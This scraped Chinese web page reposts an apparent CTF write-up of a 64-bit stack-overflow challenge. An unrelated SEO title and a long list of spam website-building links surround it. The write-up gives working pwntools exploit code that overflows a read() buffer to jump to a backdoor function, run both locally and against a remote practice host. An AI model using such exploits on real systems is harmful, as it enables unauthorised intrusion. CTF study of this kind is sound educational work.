当前位置: 首页 > wzjs >正文

电子商务网站规划方案域名搜索引擎入口

电子商务网站规划方案,域名搜索引擎入口,网站开发设计思想,wordpress 本地 插件用file分析是64位的程序 检查保护发现都是关闭的 用IDA分析,可以看到read()函数就是问题点 IDA分析时常出现的问题点: gets(buf)、strcpy(dest,sec)、scanf("%s",buf)、stract(buf,buf2)、read(0,buf,size…

用file分析是64位的程序

检查保护发现都是关闭的

用IDA分析,可以看到read()函数就是问题点

IDA分析时常出现的问题点:

gets(buf)、strcpy(dest,sec)、scanf("%s",buf)、stract(buf,buf2)、read(0,buf,size)

可以看到申请了一个48字节长度的遍历s

但是read却读取了0x100(256)字节,明显的栈溢出

从IDA分析可以看到距离rbp长度是30

也找到了后门函数

因此得到后门地址

0x400751

exp如下


from pwn import *io = process("./pwn2")get_shell_addr = 0x400751payload = b"A"*(0x30+0x8)+p64(get_shell_addr)    # 因为是64位的程序,ebp长度为8,同时后门地址要用p64转换io.sendline(payload)
io.interactive()

那么打靶场的地址获取flag

from pwn import *io = remote("117.72.52.127","11758")get_shell_addr = 0x400751payload = b"A"*(0x30+0x8)+p64(get_shell_addr)io.sendline(payload)
io.interactive()

http://www.dtcms.com/wzjs/285588.html

相关文章:

  • 海外红酒网站建设seo内容优化是什么意思
  • 动态网站建设实训实训心得北京互联网公司有哪些
  • 门户网站自查报告百度网站推广
  • linux建立网站百度广告商
  • 个人网站如何被百度收录今日国内新闻头条15条
  • 做旅游网站的好处培训心得体会万能模板
  • 怎么做静态网站房产网站建设
  • 自己创建的网站小视频关键词汇总
  • 微企点网站建设seo外包上海
  • WORDPRESS乱码HTTPSseo推广技巧
  • php建设网站教程网站优化方式有哪些
  • 怎么做类似淘宝网站吗商务软文写作范文200字
  • php 判断 $_get 然后跳转到相印的网站网店推广策划方案
  • 湖北城乡建设网站网上销售
  • 西宁网站开发公司谷歌chrome
  • 做公司 网站建设百度搜索开放平台
  • 攻击自己做的网站吗google手机官网
  • 晋中做网站2345网址导航应用
  • 一个商务宣传怎么做网站合适深圳网络营销推广专员
  • 外贸网站建设海外推广郑州网络营销推广机构
  • 网站开发工程师简历百度客服人工电话24小时
  • 番禺做网站设计谷歌seo靠谱吗
  • 网站的交互设计有什么网站制作推广电话
  • 网站建设 报价单 doc如何做品牌营销
  • 岳阳汨罗网站建设bt种子万能搜索神器
  • 沈阳手机网站建设网络营销策划模板
  • 大连建设网站制作宁波seo免费优化软件
  • oppo软件商店官网下载北京seo学校
  • 上海建设工程标准与造价信息网站seo网站推广专员
  • 做视频播放网站 赚钱seo优化基础教程pdf